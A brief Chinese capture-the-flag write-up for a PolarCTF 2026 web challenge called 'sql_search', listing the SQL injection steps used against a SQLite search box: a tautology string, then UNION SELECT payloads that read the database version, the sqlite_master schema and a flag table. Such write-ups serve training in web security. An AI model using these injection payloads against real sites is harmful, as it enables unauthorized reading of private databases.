【PolarCTF2026年春季挑战赛】sql_search

大方子2026-03-28 9:17

输入框很明显的SQL注入

使用下语句进行注入

复制代码 
' or '1'='1

通过order by 语句,知道有3列

2和3字段有回显

查询sqlite版本

复制代码 
' union select 1,2,sqlite_version()-- -

查询sqlite数据表

复制代码 
' union select 1,2,sql from sqlite_master-- -

发现有flaggggggggggg表,接下来查询得到flag

复制代码 
' union select 1,2,flag from flaggggggggggg-- -
相关推荐
持敬chijing10 小时前
Web渗透之SQL注入-文件读写-木马植入
sql·安全·web安全·网络安全·安全威胁分析
持敬chijing12 小时前
Web渗透之SQL注入-联合查询注入-注入点数据类型判断
前端·sql·安全·web安全·网络安全·安全威胁分析
藤原千花的败北12 小时前
内网安全--基础知识
安全·网络安全
大方子15 小时前
【PolarCTF】button
网络安全·polarctf
菩提小狗18 小时前
每日安全情报报告 · 2026-06-04
网络安全·漏洞·cve·安全情报·每日安全
梦里捡到一只猫丶21 小时前
简单的Payload加密方法
笔记·网络安全
憧憬成为web高手1 天前
[0CTF 2016]piapiapia 脚本和总结
web安全·网络安全
Whoami!1 天前
03-【高校】多校区链路加解密架构
网络安全·架构·链路加解密
C2H5OH1 天前
PortSwigger SQL注入LAB11
网络安全
学习3人组1 天前
Cisco ASA防火墙 NAT实验:源NAT+目的NAT(Trust/Untrust双区域,无DMZ)
网络·网络安全
热门推荐
01GitHub 镜像站点02Codex 下载安装指南:Windows 和 macOS 官方版下载03【AI】2026 年具身智能模型和世界模型总结042026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf05Codex 桌面端更新后 Chrome 插件和 Computer Use 不可用,怎么排查和修复06【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法07CC-Switch 下载、安装与使用配置指南【2026.5.29】08Codex 接入 DeepSeek API 完整配置文档09CC-Switch & Claude 基于 Linux 服务器安装使用指南10裂开!ChatGPT 居然开始要手机号验证,附详细解决方法